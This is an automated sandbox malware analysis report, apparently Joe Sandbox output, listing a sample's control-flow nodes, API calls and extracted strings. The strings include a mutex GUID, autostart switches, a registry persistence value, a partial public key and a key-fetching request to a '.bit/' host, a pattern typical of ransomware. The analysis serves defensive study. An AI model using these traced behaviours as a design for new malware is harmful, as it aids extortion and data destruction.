GetLastError 41158->41161 41187 30e678 41158->41187 41163 30e119 GetConsoleMode 41159->41163 41162 30e593 41160->41162 41180 30e67d 41160->41180 41170 30e406 41161->41170 41164 30e812 41162->41164 41175 30e5f8 WriteFile 41162->41175 41163->41154 41165 30e158 41163->41165 41164->41168 41169 305208 __wopenfile 58 API calls 41164->41169 41165->41154 41171 30e168 GetConsoleCP 41165->41171 41166->41164 41167 30e4e9 WriteFile 41166->41167 41166->41170 41167->41161 41167->41166 41168->41139 41172 30e840 41169->41172 41170->41164 41170->41168 41173 30e566 41170->41173 41171->41164 41193 30e197 41171->41193 41213 3051d4 58 API calls __getptd_noexit 41172->41213 41177 30e571 41173->41177 41178 30e809 41173->41178 41174 30e6f2 WideCharToMultiByte 41174->41161 41189 30e739 41174->41189 41175->41161 41181 30e647 41175->41181 41182 305208 __wopenfile 58 API calls 41177->41182 41212 3051e7 58 API calls 3 library calls 41178->41212 41180->41164 41180->41174 41181->41162 41181->41170 41181->41187 41184 30e576 41182->41184 41183 30e741 WriteFile 41186 30e794 GetLastError 41183->41186 41183->41189 41211 3051d4 58 API calls __getptd_noexit 41184->41211 41186->41189 41187->41170 41189->41170 41189->41180 41189->41183 41189->41187 41190 30e280 WideCharToMultiByte 41190->41170 41192 30e2bb WriteFile 41190->41192 41191 31c76c 60 API calls __putch_nolock 41191->41193 41192->41161 41195 30e2ed 41192->41195 41193->41170 41193->41190 41193->41191 41193->41195 41210 302d33 58 API calls __isleadbyte_l 41193->41210 41194 32058c WriteConsoleW CreateFileW __putwch_nolock 41194->41195 41195->41161 41195->41170 41195->41193 41195->41194 41196 30e315 WriteFile 41195->41196 41196->41161 41196->41195 41197->41105 41198->41108 41199->41121 41200->41120 41201->41108 41202->41120 41203->41131 41204->41127 41205->41141 41206->41168 41207->41150 41208->41168 41209->41145 41210->41193 41211->41168 41212->41168 41213->41168 41214->40955 41215->40957 41216->40960 41217->40965 41218->40973 41219->40492 41221 
2f3c74 _memset 41220->41221 41222 2f3c62 41220->41222 41221->40496 41223 2f3c67 41222->41223 41224 2f3c96 41222->41224 41225 303b4c 59 API calls 41223->41225 41226 32f23e 59 API calls 41224->41226 41227 2f3c6d 41225->41227 41226->41227 41227->41221 41237 32f1bb 59 API calls 3 library calls 41227->41237 41231 2f8513 41230->41231 41236 2f8520 41230->41236 41231->41236 41238 2f5810 59 API calls _signal 41231->41238 41232 2f8619 41232->40498 41234 32f23e 59 API calls 41234->41236 41236->41232 41236->41234 41239 2f6760 59 API calls 2 library calls 41236->41239 41238->41236 41239->41236 41240->40500 41241->40502 41242->40506 41243->40511 41244->40513 41245->40540 41246->40543 41247->40545 41248->40528 41249->40530 41250->40560 41251->40560 41252->40589 41253->40589 41254->40598 41255->40598 41256->40606 41285 301037 41257->41285 41259 2ec78a 41259->40618 41260 300546 41259->41260 41261 300550 41260->41261 41262 300564 41260->41262 41263 305208 __wopenfile 58 API calls 41261->41263 41262->40630 41264 300555 41263->41264 41485 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41264->41485 41266 300560 41266->40630 41269 30110d _raise 41267->41269 41268 30111e 41271 305208 __wopenfile 58 API calls 41268->41271 41269->41268 41270 30114c 41269->41270 41275 30112e _raise 41270->41275 41486 300e53 41270->41486 41272 301123 41271->41272 41531 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41272->41531 41275->40630 41276 30117d 41532 3011b5 LeaveCriticalSection LeaveCriticalSection _ungetc 41276->41532 41279 30115b 41279->41276 41492 309312 41279->41492 41280->40618 41281->40623 41282->40625 41283->40631 41284->40634 41288 301043 _raise 41285->41288 41286 301056 41287 305208 __wopenfile 58 API calls 41286->41287 41290 30105b 41287->41290 41288->41286 41289 301087 41288->41289 41304 308df4 41289->41304 41334 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41290->41334 41293 30108c 41294 3010a2 41293->41294 41295 301095 41293->41295 41297 3010cc 41294->41297 
41298 3010ac 41294->41298 41296 305208 __wopenfile 58 API calls 41295->41296 41303 301066 _raise @_EH4_CallFilterFunc@8 41296->41303 41319 308f13 41297->41319 41299 305208 __wopenfile 58 API calls 41298->41299 41299->41303 41303->41259 41305 308e00 _raise 41304->41305 41306 308af7 __lock 58 API calls 41305->41306 41317 308e0e 41306->41317 41307 308e82 41336 308f0a 41307->41336 41308 308e89 41309 308cde __malloc_crt 58 API calls 41308->41309 41311 308e90 41309->41311 41311->41307 41340 31263e InitializeCriticalSectionAndSpinCount 41311->41340 41312 308eff _raise 41312->41293 41314 308b9f __mtinitlocknum 58 API calls 41314->41317 41315 300e92 __getstream 59 API calls 41315->41317 41316 308eb6 EnterCriticalSection 41316->41307 41317->41307 41317->41308 41317->41314 41317->41315 41339 300efc LeaveCriticalSection LeaveCriticalSection _doexit 41317->41339 41328 308f33 __wopenfile 41319->41328 41320 308f4d 41322 305208 __wopenfile 58 API calls 41320->41322 41321 309108 41321->41320 41325 30916b 41321->41325 41323 308f52 41322->41323 41345 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41323->41345 41342 31c214 41325->41342 41326 3010d7 41335 3010f9 LeaveCriticalSection LeaveCriticalSection _ungetc 41326->41335 41328->41320 41328->41321 41346 31c232 60 API calls 2 library calls 41328->41346 41330 309101 41330->41321 41347 31c232 60 API calls 2 library calls 41330->41347 41332 309120 41332->41321 41348 31c232 60 API calls 2 library calls 41332->41348 41334->41303 41335->41303 41341 308c81 LeaveCriticalSection 41336->41341 41338 308f11 41338->41312 41339->41317 41340->41316 41341->41338 41349 31b9f8 41342->41349 41344 31c22d 41344->41326 41345->41326 41346->41330 41347->41332 41348->41321 41352 31ba04 _raise 41349->41352 41350 31ba1a 41351 305208 __wopenfile 58 API calls 41350->41351 41353 31ba1f 41351->41353 41352->41350 41354 31ba50 41352->41354 41432 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41353->41432 41360 31bac1 41354->41360 41359 31ba29 _raise 
41359->41344 41361 31bae1 41360->41361 41434 327f50 41361->41434 41364 31bafd 41366 31bb37 41364->41366 41371 31bb5a 41364->41371 41380 31bc34 41364->41380 41365 31c213 41465 3051d4 58 API calls __getptd_noexit 41366->41465 41368 31bb3c 41369 305208 __wopenfile 58 API calls 41368->41369 41370 31bb49 41369->41370 41466 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41370->41466 41372 31bc18 41371->41372 41375 31bbf6 41371->41375 41467 3051d4 58 API calls __getptd_noexit 41372->41467 41441 31b1c2 41375->41441 41376 31bc1d 41377 305208 __wopenfile 58 API calls 41376->41377 41378 31bc2a 41377->41378 41468 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41378->41468 41480 3042fd 8 API calls 2 library calls 41380->41480 41382 31bcc4 41383 31bcf1 41382->41383 41384 31bcce 41382->41384 41459 31b88d 41383->41459 41469 3051d4 58 API calls __getptd_noexit 41384->41469 41387 31bcd3 41388 305208 __wopenfile 58 API calls 41387->41388 41390 31bcdd 41388->41390 41389 31bd91 GetFileType 41391 31bd9c GetLastError 41389->41391 41392 31bdde 41389->41392 41395 305208 __wopenfile 58 API calls 41390->41395 41471 3051e7 58 API calls 3 library calls 41391->41471 41472 31b56e 59 API calls 2 library calls 41392->41472 41393 31bd5f GetLastError 41470 3051e7 58 API calls 3 library calls 41393->41470 41400 31ba6c 41395->41400 41398 31b88d ___createFile 3 API calls 41402 31bd54 41398->41402 41399 31bd84 41405 305208 __wopenfile 58 API calls 41399->41405 41433 31ba95 LeaveCriticalSection __unlock_fhandle 41400->41433 41401 31bdc3 CloseHandle 41401->41399 41404 31bdd1 41401->41404 41402->41389 41402->41393 41406 305208 __wopenfile 58 API calls 41404->41406 41405->41380 41407 31bdd6 41406->41407 41407->41399 41408 31bfb7 41408->41380 41411 31c18a CloseHandle 41408->41411 41409 31bdfc 41409->41408 41428 31be7d 41409->41428 41473 30f744 60 API calls 3 library calls 41409->41473 41413 31b88d ___createFile 3 API calls 41411->41413 41412 31be66 41412->41428 41474 3051d4 58 API calls 
__getptd_noexit 41412->41474 41415 31c1b1 41413->41415 41414 30b5c4 70 API calls __read_nolock 41414->41428 41417 31c1b9 GetLastError 41415->41417 41418 31c041 41415->41418 41478 3051e7 58 API calls 3 library calls 41417->41478 41418->41380 41420 31be85 41420->41428 41475 310b25 61 API calls 3 library calls 41420->41475 41476 327cac 82 API calls 5 library calls 41420->41476 41421 31c1c5 41479 31b36b 59 API calls 2 library calls 41421->41479 41425 30df14 __write 78 API calls 41425->41428 41426 31c034 41477 310b25 61 API calls 3 library calls 41426->41477 41428->41408 41428->41414 41428->41420 41428->41425 41428->41426 41430 30f744 60 API calls __lseeki64_nolock 41428->41430 41429 31c03b 41431 305208 __wopenfile 58 API calls 41429->41431 41430->41428 41431->41418 41432->41359 41433->41359 41435 327f5a 41434->41435 41436 327f6f 41434->41436 41437 305208 __wopenfile 58 API calls 41435->41437 41436->41364 41438 327f5f 41437->41438 41481 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41438->41481 41440 327f6a 41440->41364 41442 31b1ce _raise 41441->41442 41443 308b9f __mtinitlocknum 58 API calls 41442->41443 41444 31b1df 41443->41444 41445 308af7 __lock 58 API calls 41444->41445 41446 31b1e4 _raise 41444->41446 41455 31b1f2 41445->41455 41446->41382 41447 31b340 41484 31b362 LeaveCriticalSection _doexit 41447->41484 41449 31b2d2 41450 308c96 __calloc_crt 58 API calls 41449->41450 41453 31b2db 41450->41453 41451 308af7 __lock 58 API calls 41451->41455 41452 31b272 EnterCriticalSection 41454 31b282 LeaveCriticalSection 41452->41454 41452->41455 41453->41447 41456 31b134 ___lock_fhandle 59 API calls 41453->41456 41454->41455 41455->41447 41455->41449 41455->41451 41455->41452 41482 31263e InitializeCriticalSectionAndSpinCount 41455->41482 41483 31b29a LeaveCriticalSection _doexit 41455->41483 41456->41447 41460 31b898 ___crtIsPackagedApp 41459->41460 41461 31b8f3 CreateFileW 41460->41461 41462 31b89c GetModuleHandleW GetProcAddress 41460->41462 41463 31b911 
41461->41463 41464 31b8b9 41462->41464 41463->41389 41463->41393 41463->41398 41464->41463 41465->41368 41466->41400 41467->41376 41468->41380 41469->41387 41470->41399 41471->41401 41472->41409 41473->41412 41474->41428 41475->41420 41476->41420 41477->41429 41478->41421 41479->41418 41480->41365 41481->41440 41482->41455 41483->41455 41484->41446 41485->41266 41487 300e63 41486->41487 41488 300e85 EnterCriticalSection 41486->41488 41487->41488 41489 300e6b 41487->41489 41490 300e7b 41488->41490 41491 308af7 __lock 58 API calls 41489->41491 41490->41279 41491->41490 41493 3094a3 41492->41493 41494 30932b 41492->41494 41530 30938a 41493->41530 41556 31c784 72 API calls 4 library calls 41493->41556 41495 30816b __input_l 58 API calls 41494->41495 41496 309331 41495->41496 41498 30816b __input_l 58 API calls 41496->41498 41511 309354 41496->41511 41501 30933d 41498->41501 41499 3093c0 41499->41493 41502 30816b __input_l 58 API calls 41499->41502 41500 30936d 41503 30b2f2 __filbuf 72 API calls 41500->41503 41509 309372 41500->41509 41504 30816b __input_l 58 API calls 41501->41504 41501->41511 41506 3093d0 41502->41506 41503->41509 41505 309349 41504->41505 41507 30816b __input_l 58 API calls 41505->41507 41508 3093f3 41506->41508 41512 30816b __input_l 58 API calls 41506->41512 41507->41511 41508->41493 41510 30940e 41508->41510 41513 30b2f2 __filbuf 72 API calls 41509->41513 41509->41530 41514 309416 41510->41514 41533 30b2f2 41510->41533 41511->41499 41511->41500 41515 3093dc 41512->41515 41513->41530 41514->41530 41553 302d33 58 API calls __isleadbyte_l 41514->41553 41515->41508 41517 30816b __input_l 58 API calls 41515->41517 41519 3093e8 41517->41519 41521 30816b __input_l 58 API calls 41519->41521 41520 30943e 41522 309473 41520->41522 41524 309448 41520->41524 41526 30b2f2 __filbuf 72 API calls 41520->41526 41521->41508 41555 31c76c 60 API calls __input_l 41522->41555 41524->41522 41527 309460 41524->41527 41525 309487 41529 305208 __wopenfile 58 API calls 
APIs
  • Part of subcall function 002ECF10: _memset.LIBCMT ref: 002ECF4A
  • Part of subcall function 002ECF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 002ECF5F
  • Part of subcall function 002ECF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002ECFA6
• GetCurrentProcess.KERNEL32 ref: 002F9FC4
• GetLastError.KERNEL32 ref: 002F9FD2
• SetPriorityClass.KERNEL32(00000000,00000080), ref: 002F9FDA
• GetLastError.KERNEL32 ref: 002F9FE4
• GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,009F3A70,?), ref: 002FA0BB
• PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002FA0C2
• GetCommandLineW.KERNEL32(?,?), ref: 002FA161
  • Part of subcall function 002F24E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 002F24FE
  • Part of subcall function 002F24E0: GetLastError.KERNEL32 ref: 002F2509
  • Part of subcall function 002F24E0: CloseHandle.KERNEL32 ref: 002F251C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
Yara matches
Similarity
• API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
• String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1>$list<T> too long$x*>$x2?${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7>
• API String ID: 2957410896-3874714121
• Opcode ID: 714c07abc621400f71a5dd77d0e3abd255f1a16312d450a65e1db554de6bc851
• Instruction ID: 620835e5b5a52efa9e73d2e06e67affa66a932c8a8b481f3feb271e8fb9acc3b
• Opcode Fuzzy Hash: 714c07abc621400f71a5dd77d0e3abd255f1a16312d450a65e1db554de6bc851
• Instruction Fuzzy Hash: 2AD2E3705243499BD715EF20C855BABF7E8BF85344F00093CF68997292DB71AA28CF92
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00361983
                                                                                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00361994
                                                                                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 003619A1
                                                                                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 003619AE
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 003619E8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 003619FB
                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00361A2D
                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00361A81
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00361AC5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00361ADB
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00361AEE
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00361B01
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00361C15
                                                                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00361C36
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00361C50
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00361C63
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00361C76
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00361D45
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00361D73
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00361D86
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00361D99
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00361DAC
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00361DBF
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00361DD2
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00361DE5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00361DF8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00361E0B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00361E1E
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00361E31
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00361E44
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00361EDD
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00361F03
                                                                                                                                                                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00361F1A
                                                                                                                                                                        • Heap32First.KERNEL32(00000024,?,?), ref: 00361F95
                                                                                                                                                                        • Heap32Next.KERNEL32(?,?,?,?,?,662B6C70), ref: 00361FE3
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00361FF1
                                                                                                                                                                        • Heap32ListNext.KERNEL32(?,?), ref: 00362058
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00362066
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00362095
                                                                                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 003620AA
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 003620FB
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00362118
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00362187
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 003621A4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                                        • API String ID: 4174345323-1723836103
                                                                                                                                                                        • Opcode ID: 455ec25602f33aae56d3a80227ba74c366724fa8dec49508d6252fbffdb6b90e
                                                                                                                                                                        • Instruction ID: 1eece3a8e33631e718f0a604d6b1921734efaf28e13f3c81aa286874ac1f0673
                                                                                                                                                                        • Opcode Fuzzy Hash: 455ec25602f33aae56d3a80227ba74c366724fa8dec49508d6252fbffdb6b90e
                                                                                                                                                                        • Instruction Fuzzy Hash: 0332A0B1E006289AEF629F64DC45B9EB7B9FF41700F0541EAE60CE6191EB708E80CF55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,003AB3EC,000000FF), ref: 002FE6C0
                                                                                                                                                                          • Part of subcall function 002EC6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,002FE6D4), ref: 002EC6C2
                                                                                                                                                                          • Part of subcall function 002EC6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 002EC6F3
                                                                                                                                                                          • Part of subcall function 002EC6A0: RegCloseKey.ADVAPI32(00000000), ref: 002EC700
                                                                                                                                                                        • _memset.LIBCMT ref: 002FE707
                                                                                                                                                                          • Part of subcall function 002EC500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 002EC51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 002FE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 002FE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 002FE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 002FE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 002FE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002FE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002FE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 002FE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002FE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002FE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 002FEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 002FEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 002FEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 002FEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 002FEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 002FEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 002FEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEC32
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 002FEC3E
                                                                                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 002FEC51
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEC6D
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEC7F
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEC93
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 002FECB3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FED2A
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FED4B
                                                                                                                                                                        • _malloc.LIBCMT ref: 002FED55
                                                                                                                                                                        • _memset.LIBCMT ref: 002FED63
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 002FED7D
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FED85
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 002FEDA3
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 002FEDAE
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEDD3
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEDF7
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEE05
                                                                                                                                                                        • _free.LIBCMT ref: 002FEE15
                                                                                                                                                                        • _free.LIBCMT ref: 002FEE22
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEF61
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEFBF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 704684250-3586605218
                                                                                                                                                                        • Opcode ID: 68603a39e96f6117c9ed2a11793131f800697274207b9a34facb43b8febd3f6e
